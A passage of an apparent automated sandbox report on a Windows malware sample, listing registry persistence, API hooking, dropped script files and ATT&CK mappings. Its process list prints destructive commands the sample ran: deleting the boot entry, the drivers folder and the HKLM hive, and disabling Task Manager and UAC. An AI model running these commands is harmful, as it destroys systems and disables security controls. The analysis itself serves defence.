\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "hooks-0", "type": 11, "relevance": 10, "name": "Hooks API calls", "description": "\"FindResourceW@KERNEL32.DLL\" in \"cmd.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"cmd.exe\"\n \"GetLogicalDriveStringsW@KERNEL32.DLL\" in \"cmd.exe\"\n \"LoadLibraryW@KERNEL32.DLL\" in \"cmd.exe\"\n \"OpenMutexA@KERNEL32.DLL\" in \"cmd.exe\"\n \"OpenMutexW@KERNEL32.DLL\" in \"cmd.exe\"\n \"CreateDirectoryW@KERNEL32.DLL\" in \"cmd.exe\"\n \"GetLogicalDriveStringsA@KERNEL32.DLL\" in \"cmd.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"cmd.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"cmd.exe\"\n \"GetNativeSystemInfo@KERNEL32.DLL\" in \"cmd.exe\"\n \"LoadLibraryExA@KERNEL32.DLL\" in \"cmd.exe\"\n \"Process32FirstW@KERNEL32.DLL\" in \"cmd.exe\"\n \"GetProcAddress@KERNEL32.DLL\" in \"cmd.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"cmd.exe\"\n \"CreateToolhelp32Snapshot@KERNEL32.DLL\" in \"cmd.exe\"\n \"WinExec@KERNEL32.DLL\" in \"cmd.exe\"\n \"CreateProcessA@KERNEL32.DLL\" in \"cmd.exe\"\n \"LoadLibraryA@KERNEL32.DLL\" in \"cmd.exe\"\n \"CopyFileA@KERNEL32.DLL\" in \"cmd.exe\"\n \"RemoveDirectoryW@KERNEL32.DLL\" in \"cmd.exe\"\n \"CopyFileW@KERNEL32.DLL\" in \"cmd.exe\"\n \"FindResourceA@KERNEL32.DLL\" in \"cmd.exe\"\n \"LoadResource@KERNEL32.DLL\" in \"cmd.exe\"\n \"CreateProcessW@KERNEL32.DLL\" in \"cmd.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "External Systems", "identifier": "suricata-0", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"SURICATA STREAM ESTABLISHED invalid ack\" (SID: 2210029, Rev: 2, Severity: 3) categorized as \"Generic Protocol Command Decode\"\n Detected alert \"SURICATA STREAM Packet with invalid ack\" (SID: 2210045, Rev: 2, Severity: 3) categorized as \"Generic Protocol Command Decode\"\n Detected alert \"SURICATA STREAM ESTABLISHED packet out of window\" (SID: 2210020, Rev: 2, Severity: 3) categorized as \"Generic Protocol Command Decode\"", "origin": "Suricata Alerts"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"RtlSetProcessIsCritical\" (Source: 9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2, API is part of module: NTDLL.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "binary-64", "type": 8, "relevance": 3, "name": "Sample/File contains another embedded binary", "description": "Found multiple string (Indicator: This program cannot be run in DOS mode) in file %COMMONPROGRAMFILES%\\microsoft shared\\OFFICE14\\1033\\xlsrvintl.dll at offset 878670\n Found multiple string (Indicator: This program cannot be run in DOS mode) in file /tmp/21cfc7e1-c4fe-4de8-ac77-ce54fac51a37/sample.bin at offset 878670", "origin": "Binary File", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "binary-4", "type": 8, "relevance": 8, "name": "Drops a text file that contains suspicious strings (e.g. shell/ActiveX/DOM related)", "description": "\"YourMom.vbs\" contains indicator \"WScript.Shell\" (Line: 10; Offset: 37)\n \"YourMom.vbs\" contains indicator \"Scripting.FileSystemObject\" (Line: 12; Offset: 34)\n \"YourMom.vbs\" contains indicator \".Run\" (Line: 52; Offset: 14)\n \"YourMom.vbs\" contains indicator \".RegDelete\" (Line: 159; Offset: 8)\n \"YourMom.vbs\" contains indicator \".RegDelete\" (Line: 160; Offset: 8)\n \"YourMom.vbs\" contains indicator \"root\\cimv2\" (Line: 210; Offset: 72)\n \"YourMom.vbs\" contains indicator \"ExecQuery\" (Line: 211; Offset: 18)\n \"YourMom.vbs\" contains indicator \"Select * From \" (Line: 211; Offset: 30)\n \"YourMom.vbs\" contains indicator \".RegWrite\" (Line: 229; Offset: 8)\n \"YourMom.vbs\" contains indicator \".RegWrite\" (Line: 230; Offset: 8)\n \"YourMom.vbs\" contains indicator \"root\\cimv2\" (Line: 240; Offset: 68)\n \"YourMom.vbs\" contains indicator \"ExecQuery\" (Line: 241; Offset: 17)\n \"YourMom.vbs\" contains indicator \"Select * From \" (Line: 241; Offset: 29)\n \"YourMom.vbs\" contains indicator \"root\\cimv2\" (Line: 256; Offset: 77)\n \"YourMom.vbs\" contains indicator \"ExecQuery\" (Line: 257; Offset: 29)\n \"YourMom.vbs\" contains indicator \"Select * From \" (Line: 257; Offset: 40)\n \"YourMom.vbs\" contains indicator \"ExecQuery\" (Line: 270; Offset: 37)\n \"YourMom.vbs\" contains indicator \"Select * From \" (Line: 270; Offset: 48)\n \"YourMom.vbs\" contains indicator \".RegWrite\" (Line: 286; Offset: 14)\n \"YourMom.vbs\" contains indicator \".RegWrite\" (Line: 289; Offset: 14)\n \"YourMom.vbs\" contains indicator \".Run\" (Line: 300; Offset: 12)\n \"YourMom.vbs\" contains indicator \"Scripting.FileSystemObject\" (Line: 317; Offset: 36)\n \"YourMom.vbs\" contains indicator \"ADODB.Stream\" (Line: 324; Offset: 42)\n \"YourMom.vbs\" contains indicator \".Run\" (Line: 335; Offset: 11)\n \"YourMom.vbs\" contains indicator \"Scripting.FileSystemObject\" (Line: 350; Offset: 36)\n \"YourMom.vbs\" contains indicator \"ADODB.Stream\" (Line: 356; Offset: 40)\n \"YourMom.vbs\" contains indicator \".Run\" (Line: 367; Offset: 11)\n \"YourMom.vbs\" contains indicator \"ADODB.Stream\" (Line: 375; Offset: 38)\n \"YourMom.vbs\" contains indicator \"root\\cimv2\" (Line: 417; Offset: 44)\n \"YourMom.vbs\" contains indicator \"ExecQuery\" (Line: 418; Offset: 29)\n \"YourMom.vbs\" contains indicator \"Select * From \" (Line: 418; Offset: 40)\n \"YourMom.vbs\" contains indicator \"Win32_Process\" (Line: 418; Offset: 54)\n \"YourMom.vbs\" contains indicator \".Run\" (Line: 431; Offset: 8)\n \"YourMom.vbs\" contains indicator \".DeleteFolder\" (Line: 438; Offset: 13)\n \"Antivirus3.vbs\" contains indicator \"Scripting.FileSystemObject\" (Line: 7; Offset: 25)\n \"Antivirus3.vbs\" contains indicator \"WScript.Shell\" (Line: 14; Offset: 24)\n \"Antivirus3.vbs\" contains indicator \".RegWrite\" (Line: 17; Offset: 5)\n \"Antivirus3.vbs\" contains indicator \"CreateTextFile\" (Line: 108; Offset: 13)\n \"Antivirus3.vbs\" contains indicator \"CreateTextFile\" (Line: 116; Offset: 19)\n \"Antivirus3.vbs\" contains indicator \"WScript.Shell\" (Line: 145; Offset: 29)\n \"Antivirus3.vbs\" contains indicator \".RegWrite\" (Line: 146; Offset: 8)\n \"Antivirus3.vbs\" contains indicator \"WScript.Shell\" (Line: 149; Offset: 29)\n \"Antivirus3.vbs\" contains indicator \"WScript.Shell\" (Line: 175; Offset: 27)\n \"Antivirus3.vbs\" contains indicator \".RegWrite\" (Line: 195; Offset: 8)\n \"Antivirus3.vbs\" contains indicator \".RegWrite\" (Line: 199; Offset: 8)\n \"Antivirus3.vbs\" contains indicator \".RegWrite\" (Line: 201; Offset: 8)\n \"Antivirus3.vbs\" contains indicator \"Scripting.FileSystemObject\" (Line: 234; Offset: 31)\n \"Antivirus3.vbs\" contains indicator \"CreateTextFile\" (Line: 237; Offset: 9)\n \"Antivirus3.vbs\" contains indicator \"WScript.Shell\" (Line: 247; Offset: 32)\n \"Antivirus3.vbs\" contains indicator \".RegWrite\" (Line: 248; Offset: 9)\n \"Antivirus3.vbs\" contains indicator \"Scripting.FileSystemObject\" (Line: 258; Offset: 23)\n \"Antivirus3.vbs\" contains indicator \"CreateTextFile\" (Line: 269; Offset: 11)\n \"KasperskyScanner.hta\" contains indicator \"Scripting.FileSystemObject\" (Line: 61; Offset: 25)\n \"KasperskyScanner.hta\" contains indicator \"CreateTextFile\" (Line: 103; Offset: 18)\n \"KasperskyScanner.hta\" contains indicator \"CreateTextFile\" (Line: 143; Offset: 26)\n \"KasperskyScanner.hta\" contains indicator \"CreateTextFile\" (Line: 191; Offset: 17)", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "details too long to display", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"MY PROGRAM\"; Value: \"\\C:\\9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\\\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"xlsrvintl.dll\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%COMMONPROGRAMFILES%\\microsoft shared\\OFFICE14\\1033\\xlsrvintl.dll]- [targetUID: 00000000-00005808]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-136", "type": 3, "relevance": 3, "name": "Writes registry keys", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"MY PROGRAM\"; Value: \"\\C:\\9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\\\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\"; Key: \"SHELL\"; Value: \"C:\\9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"ENABLEFILETRACING\"; Value: \"00000000\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"ENABLECONSOLETRACING\"; Value: \"00000000\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"FILETRACINGMASK\"; Value: \"0000FFFF\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"CONSOLETRACINGMASK\"; Value: \"0000FFFF\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"MAXFILESIZE\"; Value: \"00001000\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"FILEDIRECTORY\"; Value: \"%windir%\\tracing\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASMANCS\"; Key: \"ENABLEFILETRACING\"; Value: \"00000000\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASMANCS\"; Key: \"ENABLECONSOLETRACING\"; Value: \"00000000\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASMANCS\"; Key: \"FILETRACINGMASK\"; Value: \"0000FFFF\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASMANCS\"; Key: \"CONSOLETRACINGMASK\"; Value: \"0000FFFF\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASMANCS\"; Key: \"MAXFILESIZE\"; Value: \"00001000\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASMANCS\"; Key: \"FILEDIRECTORY\"; Value: \"%windir%\\tracing\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\LOCAL SETTINGS\\MUICACHE\\137\\52C64B7E\"; Key: \"LANGUAGELIST\"; Value: \"en-US\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-19", "type": 3, "relevance": 10, "name": "Modifies Software Policy Settings", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CTLS\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CRLS\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CTLS\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CRLS\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CTLS\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CERTIFICATES\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CRLS\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CTLS\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CERTIFICATES\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CRLS\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CTLS\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "target-121", "type": 9, "relevance": 7, "name": "Uses REG.EXE to add/load/import registry data", "description": "Process \"reg.exe\" with commandline \"reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System /v DisableTaskMgr /t REG_DWORD /d 1 /f\" (UID: 00000000-00005608)", "origin": "Monitored Target", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MSDOS323.mp3\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\MSDOS323.mp3\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (UID: 00000000-00005808)\n Spawned process \"cmd.exe\" with commandline \"/c \"\"%APPDATA%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\Antivirus.bat\" \"\" (UID: 00000000-00005288)\n Spawned process \"bcdedit.exe\" with commandline \"bcdedit /delete {current}\" (UID: 00000000-00005376)\n Spawned process \"cmd.exe\" with commandline \"cmd /c rd %WINDIR%\\\\system32\\\\drivers/s/q\" (UID: 00000000-00005364)\n Spawned process \"reg.exe\" with commandline \"reg delete \"HKCU\\\\Control Panel\\\\Desktop\" /V Wallpaper /f\" (UID: 00000000-00005004)\n Spawned process \"reg.exe\" with commandline \"reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System /v DisableTaskMgr /t REG_DWORD /d 1 /f\" (UID: 00000000-00005608)\n Spawned process \"reg.exe\" with commandline \"ADD HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System /v EnableLUA /t REG_DWORD /d 0 /f\" (UID: 00000000-00005688)\n Spawned process \"reg.exe\" with commandline \"reg delete hklm /f\" (UID: 00000000-00005524)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindNextFileW@KERNEL32.DLL\" in \"cmd.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"cmd.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"cmd.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"cmd.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"rundll32.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"rundll32.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"rundll32.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"rundll32.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "registry-30", "type": 3, "relevance": 5, "name": "Modifies file/console tracing settings (often used to hide footprints on system)", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"ENABLEFILETRACING\"; Value: \"00000000\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"ENABLECONSOLETRACING\"; Value: \"00000000\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"FILETRACINGMASK\"; Value: \"0000FFFF\")\n 